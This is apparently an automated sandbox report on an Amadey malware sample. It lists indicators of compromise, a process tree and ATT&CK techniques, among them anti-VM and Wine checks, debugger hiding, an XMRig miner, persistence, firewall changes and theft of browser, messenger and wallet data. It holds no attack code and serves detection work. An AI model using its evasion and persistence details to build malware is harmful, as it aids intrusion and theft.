amadey | 306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab

Virtualization/Sandbox Evasion

Processes:

306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exeexplorgu.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorgu.exe

XMRig Miner payload 14 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3740-521-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-522-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-519-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-525-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-526-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-527-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-532-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-544-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-545-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-543-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-533-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-529-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-524-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig
behavioral2/memory/3740-523-0x0000000140000000-0x0000000140840000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

165 4120 rundll32.exe
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

1088 netsh.exe
2188 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
165	4120	rundll32.exe

pid	process
1088	netsh.exe
2188	netsh.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exeexplorgu.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorgu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorgu.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

explorgu.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	explorgu.exe

Executes dropped EXE 7 IoCs

Processes:

explorgu.exenew.exe35881367040156107868ae3b7424f39d.exeHjomvzwsu.exe35881367040156107868ae3b7424f39d.exe35881367040156107868ae3b7424f39d.exe35881367040156107868ae3b7424f39d.exe

pid	process
3536	explorgu.exe
3952	new.exe
1828	35881367040156107868ae3b7424f39d.exe
1520	Hjomvzwsu.exe
4464	35881367040156107868ae3b7424f39d.exe
2604	35881367040156107868ae3b7424f39d.exe
2020	35881367040156107868ae3b7424f39d.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exeexplorgu.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Wine	306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Wine	explorgu.exe

Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

4908 rundll32.exe
4120 rundll32.exe
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
4908	rundll32.exe
4120	rundll32.exe

AutoIT Executable 5 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe	autoit_exe
\??\c:\users\admin\appdata\local\temp\1000524001\well.exe	autoit_exe

Drops file in System32 directory 3 IoCs

Processes:

chrome.exepowershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	chrome.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	chrome.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exeexplorgu.exe

pid process

2728 306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe
3536 explorgu.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

35881367040156107868ae3b7424f39d.exe35881367040156107868ae3b7424f39d.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	35881367040156107868ae3b7424f39d.exe
File opened (read-only)	\??\VBoxMiniRdrDN	35881367040156107868ae3b7424f39d.exe

Drops file in Windows directory 1 IoCs

Processes:

306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe

description ioc process

File created C:\Windows\Tasks\explorgu.job 306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5884 sc.exe
3980 sc.exe
3848 sc.exe
1276 sc.exe
2236 sc.exe
4500 sc.exe
3088 sc.exe
4552 sc.exe
3300 sc.exe

description	ioc	process
File created	C:\Windows\Tasks\explorgu.job	306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe

pid	process
5884	sc.exe
3980	sc.exe
3848	sc.exe
1276	sc.exe
2236	sc.exe
4500	sc.exe
3088	sc.exe
4552	sc.exe
3300	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000531001\kiliqiuang.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5228	5368	WerFault.exe	RegAsm.exe
1180	5492	WerFault.exe	nsr6E67.tmp
1576	2908	WerFault.exe	RegAsm.exe
5992	2908	WerFault.exe	RegAsm.exe
2444	1256	WerFault.exe	987123.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4660 schtasks.exe
5484 schtasks.exe
4672 schtasks.exe

pid	process
4660	schtasks.exe
5484	schtasks.exe
4672	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

35881367040156107868ae3b7424f39d.exechrome.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	chrome.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	35881367040156107868ae3b7424f39d.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	35881367040156107868ae3b7424f39d.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exeexplorgu.exeConhost.exepowershell.exe35881367040156107868ae3b7424f39d.exechrome.exe35881367040156107868ae3b7424f39d.exepowershell.exerundll32.exenew.exe35881367040156107868ae3b7424f39d.exepowershell.exepowershell.exe35881367040156107868ae3b7424f39d.exepowershell.exe

pid	process
2728	306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe
2728	306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe
3536	explorgu.exe
3536	explorgu.exe
4480	Conhost.exe
4480	Conhost.exe
2904	powershell.exe
2904	powershell.exe
2904	powershell.exe
1828	35881367040156107868ae3b7424f39d.exe
1828	35881367040156107868ae3b7424f39d.exe
1288	chrome.exe
1288	chrome.exe
1288	chrome.exe
4464	35881367040156107868ae3b7424f39d.exe
4464	35881367040156107868ae3b7424f39d.exe
2228	powershell.exe
2228	powershell.exe
2228	powershell.exe
4120	rundll32.exe
4120	rundll32.exe
4120	rundll32.exe
4120	rundll32.exe
4120	rundll32.exe
4120	rundll32.exe
3952	new.exe
3952	new.exe
3952	new.exe
3952	new.exe
2604	35881367040156107868ae3b7424f39d.exe
2604	35881367040156107868ae3b7424f39d.exe
2604	35881367040156107868ae3b7424f39d.exe
2604	35881367040156107868ae3b7424f39d.exe
2604	35881367040156107868ae3b7424f39d.exe
2604	35881367040156107868ae3b7424f39d.exe
2604	35881367040156107868ae3b7424f39d.exe
2604	35881367040156107868ae3b7424f39d.exe
2604	35881367040156107868ae3b7424f39d.exe
2604	35881367040156107868ae3b7424f39d.exe
4120	rundll32.exe
4120	rundll32.exe
4120	rundll32.exe
4120	rundll32.exe
3952	new.exe
3952	new.exe
1056	powershell.exe
1056	powershell.exe
1056	powershell.exe
2288	powershell.exe
2288	powershell.exe
2288	powershell.exe
2020	35881367040156107868ae3b7424f39d.exe
2020	35881367040156107868ae3b7424f39d.exe
2020	35881367040156107868ae3b7424f39d.exe
2020	35881367040156107868ae3b7424f39d.exe
2020	35881367040156107868ae3b7424f39d.exe
2020	35881367040156107868ae3b7424f39d.exe
2020	35881367040156107868ae3b7424f39d.exe
2020	35881367040156107868ae3b7424f39d.exe
2020	35881367040156107868ae3b7424f39d.exe
2020	35881367040156107868ae3b7424f39d.exe
4192	powershell.exe
4192	powershell.exe
4192	powershell.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

Conhost.exeHjomvzwsu.exepowershell.exe35881367040156107868ae3b7424f39d.exechrome.exe35881367040156107868ae3b7424f39d.exepowershell.exenew.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4480	Conhost.exe
Token: SeDebugPrivilege	1520	Hjomvzwsu.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	1828	35881367040156107868ae3b7424f39d.exe
Token: SeImpersonatePrivilege	1828	35881367040156107868ae3b7424f39d.exe
Token: SeDebugPrivilege	1288	chrome.exe
Token: SeDebugPrivilege	4464	35881367040156107868ae3b7424f39d.exe
Token: SeImpersonatePrivilege	4464	35881367040156107868ae3b7424f39d.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	3952	new.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	4192	powershell.exe

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

explorgu.exe35881367040156107868ae3b7424f39d.exe35881367040156107868ae3b7424f39d.exe35881367040156107868ae3b7424f39d.exe35881367040156107868ae3b7424f39d.exerundll32.exerundll32.execmd.exeConhost.exe

description	pid	process	target process
PID 3536 wrote to memory of 3952	3536	explorgu.exe	new.exe
PID 3536 wrote to memory of 3952	3536	explorgu.exe	new.exe
PID 3536 wrote to memory of 3952	3536	explorgu.exe	new.exe
PID 3536 wrote to memory of 1828	3536	explorgu.exe	35881367040156107868ae3b7424f39d.exe
PID 3536 wrote to memory of 1828	3536	explorgu.exe	35881367040156107868ae3b7424f39d.exe
PID 3536 wrote to memory of 1828	3536	explorgu.exe	35881367040156107868ae3b7424f39d.exe
PID 1828 wrote to memory of 4480	1828	35881367040156107868ae3b7424f39d.exe	Conhost.exe
PID 1828 wrote to memory of 4480	1828	35881367040156107868ae3b7424f39d.exe	Conhost.exe
PID 1828 wrote to memory of 4480	1828	35881367040156107868ae3b7424f39d.exe	Conhost.exe
PID 3536 wrote to memory of 1520	3536	explorgu.exe	Hjomvzwsu.exe
PID 3536 wrote to memory of 1520	3536	explorgu.exe	Hjomvzwsu.exe
PID 3536 wrote to memory of 4464	3536	explorgu.exe	35881367040156107868ae3b7424f39d.exe
PID 3536 wrote to memory of 4464	3536	explorgu.exe	35881367040156107868ae3b7424f39d.exe
PID 3536 wrote to memory of 4464	3536	explorgu.exe	35881367040156107868ae3b7424f39d.exe
PID 4464 wrote to memory of 2904	4464	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 4464 wrote to memory of 2904	4464	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 4464 wrote to memory of 2904	4464	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 2604 wrote to memory of 1288	2604	35881367040156107868ae3b7424f39d.exe	chrome.exe
PID 2604 wrote to memory of 1288	2604	35881367040156107868ae3b7424f39d.exe	chrome.exe
PID 2604 wrote to memory of 1288	2604	35881367040156107868ae3b7424f39d.exe	chrome.exe
PID 2020 wrote to memory of 2228	2020	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 2020 wrote to memory of 2228	2020	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 2020 wrote to memory of 2228	2020	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 3536 wrote to memory of 4908	3536	explorgu.exe	rundll32.exe
PID 3536 wrote to memory of 4908	3536	explorgu.exe	rundll32.exe
PID 3536 wrote to memory of 4908	3536	explorgu.exe	rundll32.exe
PID 4908 wrote to memory of 4120	4908	rundll32.exe	rundll32.exe
PID 4908 wrote to memory of 4120	4908	rundll32.exe	rundll32.exe
PID 4120 wrote to memory of 4564	4120	rundll32.exe	cmd.exe
PID 4120 wrote to memory of 4564	4120	rundll32.exe	cmd.exe
PID 2604 wrote to memory of 2336	2604	35881367040156107868ae3b7424f39d.exe	cmd.exe
PID 2604 wrote to memory of 2336	2604	35881367040156107868ae3b7424f39d.exe	cmd.exe
PID 2336 wrote to memory of 1088	2336	cmd.exe	netsh.exe
PID 2336 wrote to memory of 1088	2336	cmd.exe	netsh.exe
PID 4120 wrote to memory of 1056	4120	rundll32.exe	powershell.exe
PID 4120 wrote to memory of 1056	4120	rundll32.exe	powershell.exe
PID 2604 wrote to memory of 2288	2604	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 2604 wrote to memory of 2288	2604	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 2604 wrote to memory of 2288	2604	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 2020 wrote to memory of 4296	2020	35881367040156107868ae3b7424f39d.exe	Conhost.exe
PID 2020 wrote to memory of 4296	2020	35881367040156107868ae3b7424f39d.exe	Conhost.exe
PID 4296 wrote to memory of 2188	4296	Conhost.exe	netsh.exe
PID 4296 wrote to memory of 2188	4296	Conhost.exe	netsh.exe
PID 2020 wrote to memory of 4192	2020	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 2020 wrote to memory of 4192	2020	35881367040156107868ae3b7424f39d.exe	powershell.exe
PID 2020 wrote to memory of 4192	2020	35881367040156107868ae3b7424f39d.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe
"C:\Users\Admin\AppData\Local\Temp\306b3203c583d499b9203dfa3314e2dfacbfc205237826b520ee79fa43be7aab.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2728

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3536

C:\Users\Admin\AppData\Local\Temp\1000486001\new.exe
"C:\Users\Admin\AppData\Local\Temp\1000486001\new.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3952

C:\Users\Admin\AppData\Local\Temp\1000506001\35881367040156107868ae3b7424f39d.exe
"C:\Users\Admin\AppData\Local\Temp\1000506001\35881367040156107868ae3b7424f39d.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
